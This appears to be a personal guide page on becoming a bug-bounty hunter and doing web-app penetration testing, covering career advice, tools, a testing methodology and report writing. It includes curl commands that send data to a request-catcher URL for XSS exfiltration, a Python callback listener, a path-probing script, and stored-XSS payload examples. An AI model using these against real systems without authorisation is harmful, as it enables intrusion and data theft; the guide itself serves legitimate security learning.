How to become a bug-bounty hunter and do penetration testing. Please send any comments to me.

This page updated: May 2019
      



Becoming a Bug-Bounty Hunter
Focus
Learning
Big Tools / Frameworks
Utilities
Tools / Methodology
Attacks And Vulnerabilities
Attack Tips and Tactics
Miscellaneous



Definitions





Becoming a Bug-Bounty Hunter



Ceos3c's "The different Phases of a Penetration Test"
BugBountyNotes' "Getting started in bugbounties"
Katerina Borodina's "How to Learn Penetration Testing: A Beginners Tutorial"
PTES's "Penetration Testing Execution Standard"
OccupyTheWeb's "Become a Hacker"
Sebastian Vargas's "Different Angles of Cybersecurity"
djadmin / awesome-bug-bounty / Getting Started (huge; don't get lost in here)
Guru99's "Free Ethical Hacking Tutorials: Course for Beginners" (a little stale, but worthwhile)

The usual model is "pay for results": the hacker gets paid only if they find a problem. Bugcrowd is also rolling out "pay for effort": the tester gets paid like a contractor/consultant for running tests with a defined coverage and skill level.

Is "pay for results" a fair deal ? Can a bounty-hunter make a living ?
That depends on the competence and intentions of the bounty-hunter (the following is written from a US perspective). Some grim reading:
Trail of Bits' "On Bounties and Boffins"
Jon Martindale's "Meet the bug bounty hunters making cash by finding flaws before bad guys"
Shaun Waterman's "The bug bounty market has some flaws of its own"
Sean (zseano)'s "Are you submitting bugs for free when others are being paid? Welcome to BugBounties!"
Shaun Nichols' "I won't bother hunting and reporting more Sony zero-days, because all I'd get is a lousy t-shirt"
Gwendal Le Coguic's "Cons of Bug Bounty"
Wladimir Palant's "If your bug bounty program is private, why do you have it?"

"Over 300,000 hackers have signed up on HackerOne; about 1 in 10 have found something to report; of those who have filed a report, a little over a quarter have received a bounty"
from Matt Asay's "Bug bounty programs: Everything you thought you knew is wrong"

Some good news for bug bounty-hunters:




Learn:
You can't learn or know everything, so you'll have to focus on some areas and mostly ignore others, for now.

LiveOverflow's "The Secret step-by-step Guide to learn Hacking" (video)
OccupyTheWeb's "The Essential Skills to Becoming a Master Hacker"

About pentesting as a career-path, from /u/unvivid on reddit 12/2018:

Learn IT Operations/Engineering. Pen testing is about using operations/dev tools in creative ways, about abusing trust relationships. Most people I know that are good/great have background in IT ops and know how to maneuver in those environments. They understand the challenges that operations has and don't beat on them. I'm not saying that people fresh out of school can't become great pentesters, they definitely can -- I know several. But shore up your lack of operational knowledge by building/testing/developing/engineering/Architecting. Don't focus solely on security. Deep dive IT Operations, know how to troubleshoot, know how to sysadmin and engineer networks. Know why things are built wrong/right -- understand what social/political/financial pressures drive companies. Build social skills, learn to communicate and think objectively. That's what gets people into cool jobs. ...

...

... Learn the Windows side, in passing at least. At the highest levels nearly everyone I know is OS agnostic. Yes we all love to sh*t talk MS, but nearly every environment I pentest is 90% Windows. Cloud has changed that somewhat and the winds are shifting. But knowledge of both stacks is good to have. I started my career as a Windows Sysadmin and I'd say that experience was a huge part of what got me into my first security gig. Tons of people love to sh*t on Windows, but it pays the bills and the days of the admin that couldn't script or just clicked through things is coming to an end.

My thoughts:




What are your strengths ?
If you think "I have NO strengths, I'm at ZERO": well, you're using a computer (or phone) to read this page. So you have some device and internet access and some knowledge of how to use that device and the internet. So you're not at ZERO. That device will let you create and edit and view HTML files locally, so you can use it to learn HTML and CSS and Javascript. So, you have a start !



Understand the legalities and rules of engagement:

Interesting list of what is not a bug, in Facebook: Facebook's "Commonly submitted false positives"



Strategies:

To me, the "money" and "security and correctness are important" items generally spell "corporate or govt apps" these days. There aren't going to be big bounties for finding some text-formatting bug in MS Office, or a play-flaw in some game, or bugs in open-source software such as Linux or Node packages. (Except see Julia Reda's "In January, the EU starts running Bug Bounties on Free and Open Source Software".)

The trick probably is to find a target small enough that it hasn't been picked over by a lot of hunters, but big enough to have a bounty program.

Fisher's "[HackerOne] - Prioritizing and choosing a program to focus on"

"Want an easy way to find new bug bounties? Search for the term 'bug bounty' on Indeed or LinkedIn Jobs. You will see public AND private bounty programs."
from tweet by Paul Seekamp.

From /u/cym13 on reddit:

The advice with bug bounties is always the same: look for things nobody else thought of in places nobody else thought of.

It is good practice for websites setting up a bug bounty program to first perform a security assessment of the platform, or at the very least launch automatic detection tools.

Furthermore you're in competition with thousands of other researchers, so finding the obvious is not something you should strive for: if it's obvious, someone else will have found it before you. Maybe you'll be the lucky one but that's a game where there's not always a winner and always thousands of losers.

This means your efforts are best spent:

Success stories including some strategy:
Maycon Vitali's "Talk is cheap. Show me the money!"

I wonder about this: suppose you find a bug in some foundational library or product, such as Electron or libssl ? Can you report it to N companies who all use that dependency, getting a separate bounty from each of them ? [I guess you'd have to show a POC for each of them, giving specific URLs and demonstrations for each app.] Or do you just report once to the source of the problem, getting one (smaller or zero) payment from that source ?

A variant of this: find a misconfiguration or misuse of some common library or product, and see if N other companies make the same mistake.



Figure out resources for the given target:
Ceos3c's "The different Phases of a Penetration Test"
Luke Rixson's "Hacking how-to's: Developing your process"
Barrow's "How to Organize Your Tools by Pentest Stages"
Occupy4eles's "Use Magic Tree to Organize Your Projects"
OccupyTheWeb's "The Hacker Methodology"

More about this later (Reconnaissance).



How to report effectively:
More about this later (Reporting).

SheHacksPurple's "Security bugs are fundamentally different than quality bugs"



After reporting:

Your bug will have to be:
  1. triaged,
  2. validated,
  3. evaluated,
  4. fixed,
  5. fix tested,
  6. fix deployed,
  7. then maybe publicized.
Payment may come at any stage. Third parties and Legal may be involved. Be patient. Don't disclose to anyone else without written approval.



What to expect from bug-bounty hunting:
kongwenbin's "A Review of my Bug Hunting Journey"
Marcin Szydlowski's "Inter-application vulnerabilities and HTTP header issues. My summary of 2018 in Bug Bounty programs."
Trail of Bits' "On Bounties and Boffins"
Erin Winick's "Life as a bug bounty hunter: a struggle every day, just to get paid"
phwd's "Respect yourself"
Caleb Kinney's "How to Fail at Bug Bounty Hunting" (video)
Frans Rosen's "Eliminating False Assumptions in Bug Bounties" (video)

More about competition:
I see several Facebook groups full of guys in India, Pakistan, Bangladesh who are running tools and pushing buttons and trying to figure out what they're doing. Probably there are a lot more on Twitter and other places, and from China and Nigeria and Philippines etc.

They have access to the same internet and same tools that you do. If all you learn how to do is run scans and catch very simple bugs, you will be competing with those guys.

Companies are moving to application frameworks instead of lots of custom code. Those frameworks probably do the basics (authentication, input sanitizing, URL-checking, permissions, database access, etc) fairly safely. If all you learn is how to catch simple bugs, you may be pursuing a dwindling pool of bugs.








Focus



You can't do everything, you have to narrow it down.

If your goal is to get a corporate job eventually, focus on areas that will help you get that. Probably not much demand for Wi-Fi cracking or password-cracking skills in corporate jobs.



I'm going to mostly ignore some target areas:



What I'll focus on:

[From this point, everything assumes Web app / database as the focus.]



My personal situation:







Learning



There are so many sites and tools that you can go crazy trying to know about all of them. Find some that work well for you and get started, don't worry about the rest.



Learn from:

Hacking Articles' "Understanding the HTTP Protocol"
Hacking Articles' "Beginner Guide to Understand Cookies and Session Management"

reddit's /r/hacking
reddit's /r/HowToHack
reddit's /r/bugbounty

Some people say: learn from the bottom up, learn the details of protocols and languages and do exploits manually, or else you're just a script-kiddie pushing buttons on tools you don't understand. I say: there's nothing wrong with knowing only some basics and using existing tools. Then iterate up and down, figure out what's really happening when you execute some script, learn more about the language the web app is using, learn more about features of the tool you're using. Push forward your learning on all levels, bit by bit.

Common Terms/Techniques:





Bug-Bounty Programs (and other things to join):

hackerone
Bugcrowd
Intigriti
Portswigger (for their "Web Security Academy")

Thuvarakan Nakarajah's "Bug Bounty Guide"
EdOverflow / bugbounty-cheatsheet / bugbountyplatforms.md
Guru99's "Top 30 Bug Bounty Programs in 2019"
Firebounty (part of Yes We Hack)

Smaller programs may have less competition.

Subscribe to:
Pentester Land's "The 5 Hacking NewsLetter"



Information:

Ceos3c's "What are Payloads in Hacking Lingo?"

If you run into unfamiliar tech, maybe get an intro at:
tutorialspoint's "Tutorials Library"
OverAPI
W3Schools
Rosetta Code's "Category:Programming Tasks" (see same app implemented in N different languages)



Challenges:

I'm focused on single-person mostly-web-app challenges and labs.

CTF (Capture The Flag) challenges tend to be team-based and often in-person and/or within a specified time-period, and more about cracking encryption or binary files or reverse-engineering etc (although some include web apps), I think. I'm not interested in those. Maybe see Capture The Flag 101.


Each challenge could be:

For some challenges, mainly XSS, you need an external web site the victim will access, and a way for you to pick up the params they sent to that site. See External web site section.


[The first few are listed in the order I suggest doing them:]
amanhardikar's "Penetration Testing Practice Lab - Vulnerable Apps / Systems" (ignore big image, see lists of sites; huge, don't get lost in here)
Anastasis Vasileiadis' "dvca: Damn Vulnerable Cloud Application"
Anastasis Vasileiadis' "vuLnDAP: A vulnerable LDAP based web app written in Golang"
EdOverflow / bugbounty-cheatsheet / practice-platforms.md
blackMORE Ops' "124 legal hacking websites to practice and learn"

OWASP Vulnerable Web Applications Directory Project (click on tabs across the top of page)
bitvijays's "CTF Series : Vulnerable Machines" (lots of techniques)
"Web Penetration Testing Lab setup" articles in Hacking Articles' "Web Penetration Testing"
CyberX's "Hacking Lab Setup" (more than just lab setup)

Cyber Security Blog (a few walkthroughs)
Hacking Articles' "CTF Challenges" (lots of walkthroughs)

From discussion on reddit 1/2019:
> Real life box vs vulnhub/hackthebox vm
> For those who had real life exp. How similar or different was it?

Some are similar a lot are not. Real world is primarily misconfiguration and out of date software

...

Exactly true. Also, in real life you don't see nearly as many ports exposed as you see on many of these boxes. It's quite rare to see a machine in real life that has 80 and 443 open to the world that also has anything else open like 22, 25, 445 etc.














Big Tools / Frameworks



I'd like to use free tools. Many of the best tools have huge price-tags. The following tools are free unless indicated otherwise.

There are a zillion tools available, and many of them are GUIs or frameworks that call other tools. Many people have just written scripts or GUIs that duplicate other efforts and don't add much value. Some tools have multiple versions, with the really good functionality available only in the very expensive "Pro" version. Some tools were hot 10 years ago and haven't been maintained since then.

[From this point, everything assumes Linux as your test-driver machine.]



The main classes of big tools of interest for web-app testing (I think):
There is lots of overlap, and tools can import/export among each other.



Be careful about just running "try everything" in some big tool, or some script that calls lots of tools. You may hammer your target with port-scanning, attack traffic, and brute-forcing, setting off alerts at the target and your ISP, possibly causing a DoS at the target, and getting yourself in trouble.



Browser-proxy and app-logic GUIs:




Vuln-scanners with exploits and payloads:




Automated testing drivers:

Some of the big tools in the previous two sections (such as OWASP ZAP and Metasploit) have APIs and/or CLI interfaces and headless operation that let them be driven as testing engines.

Threadfix.
Minion.



Distros and tool bundles:

My opinion at the moment:
"Number of things installed" does not equal "power". Better to install each tool yourself, so you know something about how it works and what it's doing. And you're probably not going to test all the areas covered by the Kali tools; maybe you'll test web apps, so the tools for Wi-Fi cracking and password brute-forcing and malware reverse-engineering and smartphone-exploitation and such are just distractions. I'm just installing individual tools on Linux Mint and using them there.

From /u/subnetq1:
> So after messing around with Kali, then Kali Light and Black Arch,
> then Arch w/ Black Arch Repos, I was just curious. What are some
> major differences between the latter of the two, or is it just a
> matter of preference? I know there are some obvious differences:
> 1. Kali Light includes xfce, while Arch doesn't really include anything.
> 2. Kali uses apt, Arch uses pacman.

Metasploit is Metasploit whether you run on Arch or Kali, the package manager makes no difference. What you are really buying into when you decide 'black arch' or 'kali' is a set of default configurations, default packages, default desktop environments (all of which are changeable), and a specific support team (how fast will they update packages, and provide new releases, will they do this in a timely manner for your favorite packages?, how well integrated are the packages? Do they consistently work?)

All of this is why you might choose to use a distribution like Kali, or Black Arch, for pentesting. You can install Metasploit or most other common pentesting tools in Ubuntu. But they are not a priority, and may not be updated as frequently, or integration bugs fixed as fast as with Kali or Black Arch - these distributions have a commitment to supporting these packages as "mission essential" for the distribution.








Utilities



Browser:


Browser Add-ons:




External web site to send data to:
For some challenges, mainly XSS, you need an external site the victim will access, and a way for you to pick up the params they sent to that site.

One way to do that is to use RequestBin. Go there in your browser, click the "Create a RequestBin" button, and get a URL with a random token on the end, such as "http://requestbin.fullcontact.com/yvc8t6yv". Have the victim do a GET or POST to that URL, equivalent to:
curl -X POST -d "fizz=buzz" http://requestbin.fullcontact.com/yvc8t6yv
# or
curl -X GET http://requestbin.fullcontact.com/yvc8t6yv\?param1\=5555
Then in browser, go to "http://requestbin.fullcontact.com/yvc8t6yv?inspect" to see the data that came across.

Similar: Webhook.site
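
If you'd rather not send target data through a third-party service, a few lines of Python on a server you control can act as a crude request catcher (a sketch; the port and output format are whatever suits you):

# Minimal request catcher: print the method, path, headers and body of every request.
# Run on a host you control:  python3 catcher.py 8080
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer

class Catcher(BaseHTTPRequestHandler):
    def _log(self):
        length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(length) if length else b''
        print(self.command, self.path, dict(self.headers), body)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'ok')
    do_GET = _log
    do_POST = _log

port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
HTTPServer(('', port), Catcher).serve_forever()

Point your payload at http://your-host:8080/anything and watch the console.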



Recording your work:

See the Recording Desktop Activity and Recording CLI Activity sections of my Linux page.



Managing the project:

I want something that will:
A lot to ask.

There seem to be a lot of tools for managing N people testing one business.
I want a tool for 1 person testing N businesses/apps.

Refined my thinking a bit, and asked this:
Looking for a test-organizing app for bug-bounty-hunting

I am looking for some "dashboard" app that presents a matrix of combinations: role in app, type of client device, type of client browser, app functional area. Then for each point in the matrix, there are buttons to launch apps such as Burp Suite, OWASP ZAP, Metasploit, nmap. Also buttons to list vulnerabilities found at that point in the matrix.

I would use this to manage my bug-bounty-hunting process. Within each app such as Burp Suite, some operations would be automatic and some manual. But I'm not looking for the test-organizing app to run any of the tests, just to be a dashboard and connect me to the appropriate lower-level apps, probably giving a label such as "normal user, using desktop Firefox, doing login/logout".

Does anything like this exist ? I've looked at a few things, such as OpenVAS. Couldn't get Dradis install to work. Looked at sh00t. I've used Burp Suite and OWASP ZAP and nmap, haven't tried Metasploit yet. Many other apps on my list to install and try.

Does something like Selenium do this ? I don't want to run automated tests, I want to manage the process and point to other tools.

Thanks for any help.

I don't want to replicate any of the port-mapping or page-tracking or report-generating features of big suites such as Burp or ZAP. I want a dashboard where I can see which areas have been covered and which haven't, and click to launch into the appropriate tool to do testing or to see the existing vuln/exploit/report or to see the relevant app pages and documentation pages.
"test matrix application"
"Test management tool"
"requirements traceability matrix"
But I don't need multi-user, I don't need graphs and reports and data analysis, don't need links to version control, don't need build control, trouble tickets.

Mockup1
Actual so far

Ceos3c's "The different Phases of a Penetration Test"
Luke Rixson's "Hacking how-to's: Developing your process"
Barrow's "How to Organize Your Tools by Pentest Stages"
Occupy4eles's "Use Magic Tree to Organize Your Projects"
OccupyTheWeb's "The Hacker Methodology"



Your own OPSEC:

You may create new vulnerabilities in the target. You may create a tunnel that violates all of their security policies. You may see trade secret or proprietary or PII data. Your report is confidential, unless and until the client approves release of it. How are you going to protect those things from someone else coming in and trying to exploit/grab them ?

Assume someone smarter than you is trying to get into the same target that you are, and may be targeting YOU, trying to piggyback on you. Is some new plug-in or script or exploit that you grab from somewhere really safe, does what it says it does, can you trust it ? Are your tools updating themselves over unencrypted connections ?

Have you changed default passwords on Kali, the big tools, etc ? Are you using 2FA on your important online accounts ? Are you storing data in encrypted containers, that are open only when you're using them ?

DEF CON 23 - Wesley McGrew - I Hunt Penetration Testers: More Weaknesses in Tools and Procedures (video)
My "Computer Security and Privacy" page


Probably a bigger risk is that some ISP or big corp might blacklist you:
Mike Felch article (ignore the title)



The main tools I'll be using for web-app testing (I think):







Tools / Methodology



Barrow's "How to Organize Your Tools by Pentest Stages"
Bugcrowd's "Researcher Resources - Tools"
JDow's "Web Application Penetration Testing Cheat Sheet" (misleading title)
OWASP Testing Guide v4 Table of Contents

These are loosely organized into the phases where you'd use them. But many tools straddle several phases. And the exact names and definitions of the phases differ from source to source.

The organization I've chosen:
    [Reconnaissance]

  1. Learn the application: log in as user, do normal things, understand the application.

  2. Domain/server Discovery: OSINT and DNS work to get lists of domains and servers.

  3. Port scanning those domains/servers: scanning to verify domains and servers and ports exist.

  4. Verifying domains/servers/services: scanning to get banner pages etc to show what services are running.

  5. [Analysis]

  6. Site/server Analysis: get software versions and patch levels etc.

  7. Content Discovery: find files on servers.

  8. [Attack]

  9. Probe pages/scripts with bad parameters: attack bad input-handling.

  10. Attack application code and logic: more complicated attacks (XSS, SQLi, etc).

  11. [Cleanup and Reporting]

  12. Remove anything you've installed or modified.

  13. Report what was done and results.

  14. Post-Reporting.




Cautions:
Some tools or techniques are forbidden in some bounty-hunting programs, maybe because they generate so much network traffic or tie up the servers or affect real users.

Use a VPN (unless you're doing custom traffic inside a LAN). Some clients may have automatic software that bans IP addresses that produce suspicious traffic, even if you're authorized to do testing. And it may add your IP to a blacklist that many companies use, not just the target. [This raises the question: are you going to get your VPN company blacklisted ?]

Don't just push the "scan" button on some huge framework and hope the right thing happens. Set the scope and configuration for the scanning, know what it's going to be doing.

From "Penetration Testing" by Georgia Weidman (on Amazon):
"Be forewarned: Not all public exploit code does what it claims to do. Some exploit code may destroy the target system or even attack your system instead of the target. You should always be vigilant when running anything you find online and read through the code carefully before trusting it."

"Scanning for vulns" is not the same as "penetration testing". Scanners make mistakes or give false positives. Follow up each hit with manual testing, and make sure you know what is happening, and try to broaden the scope of the problem. Don't just report scanner results and expect a bounty. Clients often have contracted with expensive pentesting companies that produce huge lists of scanner-hits, but then the client finds only 3 of them are worth fixing.



    [Reconnaissance]

  1. Learn the application:

    [Maybe most of this is more applicable to corporate apps, not consumer apps. But apps are getting more complex all the time.]

    • RTFM. Read sales literature or watch videos. Is there a demo on the target's web site ?

    • Log in to the app, do normal things, understand the application.

    • Maybe diagram the flow and reach of the application. What are the roles, the data, the operations/transactions, the states of the application ? Make a matrix of roles and permissions ? (See ZAP's "session comparison" feature)

    • What is the most valuable information in the application ?
      How important is availability/uptime of the application ?
      Are some parts critical to regulations such as PCI, HIPAA, GDPR, DFARS, COPPA ?
      Where is there money, where is there PII ?
      Is there a privacy policy page ?
      Can users control collection of their data, get a copy of their data, delete their data, delete their account ?

    • Are there things where one user could affect another user ? Such as messaging, creating a new public theme, creating a new store, offering items for sale, commenting on another user's page ?

    • Are there points where a user uploads content (files, notes, comments, URLs, requests, problem reports, themes) into the application ?

    • Try different roles ("authorizations", or "auth-z"s) in the application, different transactions, maybe create multiple users, try deep features that may be less-tested, try unusual features such as password reset, change username, delete account, cancel order. Try desktop and mobile, different human languages, different browsers.

    • What are the default or standard accounts and passwords ? Are there demo or example or admin accounts ? Suppose the installer blindly followed the examples and defaults in the manual, what accounts and passwords and server names would be created ?

    • Are there demo or example pages ? Or a complete example application that might have accidentally been left on the server ?

    • Does the application require that users modify their computers, installing a certificate or app or applet or browser extension, or naming the web-app's domain in a "trusted" security zone of the browser ? What behavior do those things have ? Is there messaging between them ? What kind ?

    • If the application handles internal corporate users as well as public users, are the internal users required to use some ancient browser such as IE6 ? Do they use ActiveX controls ?

    • What technologies and libraries does the application use ? Are some scripts loaded dynamically, as in ad-networks ? Ad code is more likely to have vulnerabilities or provide a path to create a vulnerability in the application.

    • Does the application use old, deprecated technologies, such as Flash or Silverlight ? PDF documents, while not deprecated, have their problems.

    • How is authentication ("auth-n") done, and persisted ? Are there different login points, different types of authentication ? Encryption ? Is there rate-limiting, timeout, lockout ? Rules to enforce strong passwords ? Can usernames be enumerated somehow ?

    • Are there different parts of the application that look different or are built differently ? Are parts of it "legacy" and parts of it new ? Are parts of it free and other parts behind a paywall ? Check how each part is made, and the boundaries between them. How is authentication done, and passed between them ?

    • Are there sub-domains or parts of the application that are listed as "out of scope" for testing ? Maybe they're neglected or full of bugs. You might look at them to see if anything in them might be replicated in the in-scope areas.

    • Is there an issues or to-do list on GitHub or somewhere else ? A forum where users are grousing about problems ? Same for any of the frameworks or major libraries the app is using.

    • Can you install the application locally, on your own machine(s) ? This will make it much easier and safer to learn it, brute-force it, create privileged users, dig into internals and source code, examine log files, etc. Where are the log or audit files ? Is there a master config file ? Is there a debug mode ? Are there hooks or modes for testing ? Where and how are credentials stored ? What OS user is the app server code running as ? How does it update or get patched ? How is it backed up and restored ? How are patches applied ? Are there cron jobs or daemons ? Can you extract version numbers of internal modules, packages or libraries ? Does the app depend on any other services ? Can you install those locally too ?

    • If you can get the source code, you could try running static code-analysis tools on it.

    This is a lot of work. Maybe if you're very good, or very specialized, or feeling reckless, or just looking for a quick score, you can skip much of this learning, and just plunge into the app and see what the pages look like.

    But learning the app may give you a big edge over other hunters, and you may be able to test features they can't get to. If the same app is used by other targets, maybe learning it well is worthwhile. What company wrote this app ? Maybe look at other apps they've written.

    You could always alternate both styles: take a quick shot at the app, read the manual a bit, take another shot, learn more about the app, do some more poking, etc.


  2. Domain/server Discovery:
    OSINT and DNS work to get lists of domains and servers.

    Also see OSINT section.

    [For testing corporate web apps, probably this whole phase is almost useless. The company's bug-bounty program will define a scope that lists the exact domains to be tested.]

    Don't re-invent the wheel, especially when it comes to scanning across the internet. There are a bazillion tools already available. Use Google Search, see Crawler.Ninja, Common Crawl, Shodan, more.

    Fox-IT's "Getting in the Zone: dumping Active Directory DNS using adidnsdump"


  3. Port scanning those domains/servers:
    Scanning to verify domains and servers and ports exist.

    [For testing corporate web apps, probably this whole phase is almost useless. The company's bug-bounty program will declare this out of bounds; they don't want their network or servers bombarded, they want you to find application logic or coding errors.]



    sanspentest's "Web Application Scanning Automation"

    See the "Port scanning and router testing" section of my "Computer Security and Privacy" page.


  4. Verifying domains/servers/services:
    Scanning to get banner pages etc to show what services are running.

    Public Suffix List


  5. [Analysis]

    See Chapter 4 "Mapping the Application" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).

  6. Site/server Analysis:
    Get software versions and patch levels etc. Get the site headers / policies (htaccess). Are the security settings tight ?

    Also see Web Apps section.

    Once you know what libraries or products the app is using, look for CVEs for those.

    Guru99's "How to Hack a Web Server"
    Anant Shrivastava's "Web Application finger printing"
    David Fletcher's "Finding: Server Supports Weak Transport Layer Security (SSL/TLS)"


  7. Content Discovery:
    Find files on servers.

    Try various user-agent strings; the application may serve different files to different clients.

    Try logging in as users with various privilege levels; the application may serve different files to different roles.
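
    A minimal sketch of wordlist-based content discovery, varying the User-Agent per pass (the target URL, paths and agent strings here are made up; dedicated tools such as dirb, gobuster or wfuzz do this better):

    # Probe a small wordlist of paths with two different User-Agent strings,
    # reporting anything that doesn't come back 404.
    import requests

    base = "https://target.example"        # hypothetical target
    paths = ["admin/", "backup.zip", "phpinfo.php", ".git/config", "api/"]
    agents = {
        "desktop": "Mozilla/5.0 (X11; Linux x86_64) Firefox/66.0",
        "mobile": "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X)",
    }

    for label, ua in agents.items():
        for p in paths:
            r = requests.get(base + "/" + p, headers={"User-Agent": ua},
                             allow_redirects=False, timeout=10)
            if r.status_code != 404:
                print(label, r.status_code, p, len(r.content))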




  8. [Attack]

  9. Probe pages/scripts with bad parameters:
    Attack bad input-handling.

    Generally, by now (or in earlier phases), you're using a special "intercepting proxy" between you (browser or app) and the network. The proxy supports recording the outgoing requests and the incoming results, and then analyzing them, repeating them, altering them. Examples are the proxies in Burp Suite, OWASP ZAP, and Telerik Fiddler.



  10. Attack application code and logic:
    More complicated attacks (XSS, SQLi, etc).

    What is the structure of a web page ? Is the application using frameworks ? Are there iframes ? Is there messaging among parts of a page ? Is data on app server being changed via form posts, or page-gets ? How are sessions identified ?

    A key thing is to track where inputs go and what they affect. Are they sanitized ? How are special characters handled ? Do inputs change tags on the page ? How are they sent down to the app server ?

    Sanitizing/escaping probably should be done differently for URLs, form fields, and variables. If they're all done the same way, probably one of them is vulnerable.

    If you have accounts with different levels of privilege, try doing all operations as the high-privilege user, then log out, log in as low-privilege user, and replay all the operations (changing session ID or CSRF token to new value).

    See Specific Attacks And Vulnerabilities section.

    OWASP's Xenotix: XSS tester.

    Netsparker ($5K per year)
    Acunetix ($9K)
    Probe.ly (free for VERY limited version, about $500/year for "Starter" version)
    HTTPCS (about $650/year for "Basic" version)
    IronWASP (free; essentially Windows-based; latest release in 2015)

    Try to find the biggest scope for the bug. Multiple browsers, multiple OS's, desktop and mobile, multiple versions, multiple countries, multiple users, etc.



    Tools for specific targets:



  11. [Cleanup and Reporting]

  12. Cleanup of the target system(s):
    Keep good notes, so you can clean up at the end of the testing, or tell the target what was modified.

    If there's something you can't clean up, notify the client/target so they can clean it up.


  13. Reporting:

    • Start building your report as you test, don't leave it all until the end.

    • Don't report results you don't quite understand, from scans, in the hopes that some of them gain a bounty. You don't want to flood the company with false positives or incoherent reports. You need to drill down on each item and get a clear understanding of it.

    • Don't report some picky error or weakness, such as HTTP headers that are not as tight as they could be.

    • Re-read the allowed scope and known (excluded) vulnerabilities, to make sure your bug is okay.

    • Double-check the bug, run it again from a clean state. If possible, run it in a clean browser with no add-ons and no intercepting proxy. If it's a mobile bug you found through an emulator, re-check using a real device.

    • Target may have a standard form for reporting bugs.

    • Document clearly, with exact URLs and with pictures and video, for both vulnerability and exploit (if separate). Assume that your report will go to some triage person who isn't familiar with the app, then maybe to some junior programmer. Don't rely on technical bug-bounty jargon or assume the developers know it.

    • Document browser, OS, country, language, app version, etc if relevant. Make sure you're on latest browser and OS, no browser add-ons are interfering, if these are relevant.

    • Explain the severity and effects, for both developer and non-technical audiences. Can the attacker steal money or PII ? Create fraudulent orders ? Send messages to other users, to get them to transfer money or give up credentials or PII ? Delete or corrupt or ransomware the database ?

      This is critical; don't report a bug without it. You can't just say "well, I did XSS, your code let me pop up an alert". You have to say "I did XSS and it let me grab THIS private information THIS way".

    • Note the range of the bug. Are all web pages of the app vulnerable in the same way ? Does it affect multiple users ? Does it affect admins ?

    • Maybe refer to standard classifications, such as Bugcrowd's Vulnerability Rating Taxonomy.

    • Maybe note any possible regulatory or legal impacts, but be careful, this is not your area of expertise.

    • Maybe suggest a fix, but be careful, you may not know enough about the app.

    • Don't editorialize or be harsh or advocate an urgent fix; let the facts speak for themselves.

    • You're reporting to busy professionals in a business, who will decide whether to give money to you. Write concisely and professionally, with correct grammar and spelling. Format the report in some reasonable way, with headings and lists as appropriate. Don't waste their time, or use hacker slang, or try to come across as a tough-guy hacker-wizard.

    • It would be nice to have a second person proofread your report and see if they understand it, but maybe that would violate confidentiality.

    • If you've done anything to a production server that you were unable to clean up afterward, explain and give details so the company can clean it up.


    Be especially rigorous in your first few reports, when you're unsure of the process and trying to build a reputation.

    John Stauffacher's "Advice for Writing a Great Vulnerability Report"
    Ryan Satterfield's "How To Write a Proof Of Concept For Security Holes"
    Bugcrowd's "Reporting a Bug"
    Gwendal Le Coguic's "How to write a report"
    ZephrFish / BugBountyTemplates
    Nicholas Handy's "Bug Reporting for Bug Bounties"
    tolo7010's "Writing a good and detailed vulnerability report"
    Bugcrowd University - How to Make a Good Bug Submission (video)
    Melisa Wachs' "DOs and DON’Ts of Pentest Report Writing"
    Pentester Land's "List of bug bounty writeups" (very uneven, more articles than reports, but ...)


  14. Post-Reporting:
    It's possible the target may want to make a fix and then have you re-test.

    Do you have a lot of the target's data saved on your systems ? That is a legal liability to you; you are responsible for protecting it, perhaps to standards dictated by GDPR or some other regulations. Probably best to delete all of it.

    At some point, after ALL is done, you may even want to delete your report, or at least redact it to remove the target's sensitive data from it. What could happen if someone steals it from your system ? What could happen if the data is published (not because of a breach of your system), and there is an investigation of everyone (including you) who possessed that information ?




SecTools.Org (a bit stale)
Pentesting Tutorials' "Pentesting Methodology Tutorial"
EdOverflow / bugbounty-cheatsheet / special-tools.md

OnlineHashCrack (hash identifier)
TunnelsUp's "Hash Analyzer"
CyberChef
psypanda / hashID
Code Beautify (many converters, decryptors, validators)
MD5 conversion and MD5 reverse lookup (MD5 = 32 hex digits)
CrackStation (hash cracker)
Browserling's "Web Developer Tools"
Web Toolkit Online

bugbounty.link: URL-shortener that supports any protocol.
HTTPie: command-line HTTP client.







Attacks And Vulnerabilities



Context:
It's confusing that tools and attacks and exploits often don't make the required context clear. Does a tool / attack / exploit operate:



Resources:
Some apps, tools, attacks, or exploits may require that you have specific resources:





Attack Surfaces:



Attack Targets/Patterns:
It's confusing, because:
For example, SQLi:



What you'll do:
Probably you'll:
  1. Start ZAP and Firefox, and browse the application manually for a while.
  2. Use the results recorded in ZAP to tweak ZAP, telling it about such things as session token names and login credentials.
  3. Run scans and attacks in ZAP and see what it reports.
  4. Explore any vulns, through ZAP and manually in the browser.
  5. Start Metasploit and try to exploit vulns.
  6. Run appropriate specific tools, such as sqlmap, WPScan, CMSmap, etc.
  7. Write reports on anything you've found, double-checking manually in a clean setup.
  8. Try to broaden or chain any vulns and exploits.
  9. Learn more about the application.
  10. Review project checklist, see if you've checked everything.
  11. Iterate as needed.

Aakash Choudhary's "Bug-Hunting-Mentality"
ZeroSec's "LTR101: WebAppTesting - Methods to the Madness"
Marcin Szydlowski's "Inter-application vulnerabilities and HTTP header issues. My summary of 2018 in Bug Bounty programs."
bitvijays's "CTF Series : Vulnerable Machines" (lots of techniques)
OWASP's "Category:Attack"
OWASP Testing Guide v4 Table of Contents
Prasanthi Eati's "10 Most Common Web Security Vulnerabilities"
Gwendal Le Coguic's "Vulnerabilities list"

Detectify's "OWASP Top 10 Vulnerabilities Explained"
David Schutzs "OWASP Top 10 Like I'm Five - BSidesBud2019"

You can look at OWASP Top 10 for most common types of vulnerabilities. But look back into the previous years of this list, for some items that have been pushed off the list but still are worth testing.

Sakurity Network's "Why OWASP Top 10 is no longer relevant"




Unsafe Input Handling

Code Injection:
Submit code that gets executed in the context of the application.
Wikipedia's "Code injection"

Submit a script into a Comment field or theme; it gets stored in the database ("stored cross-site scripting"), and later other users view your "comment" or use your theme and the script runs in their browsers. If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.

Examples:
<img src='nosuchfile' onerror='alert(123);' />
<a onmouseover='alert(234);'>alert here</a>
<script>alert(345);</script>
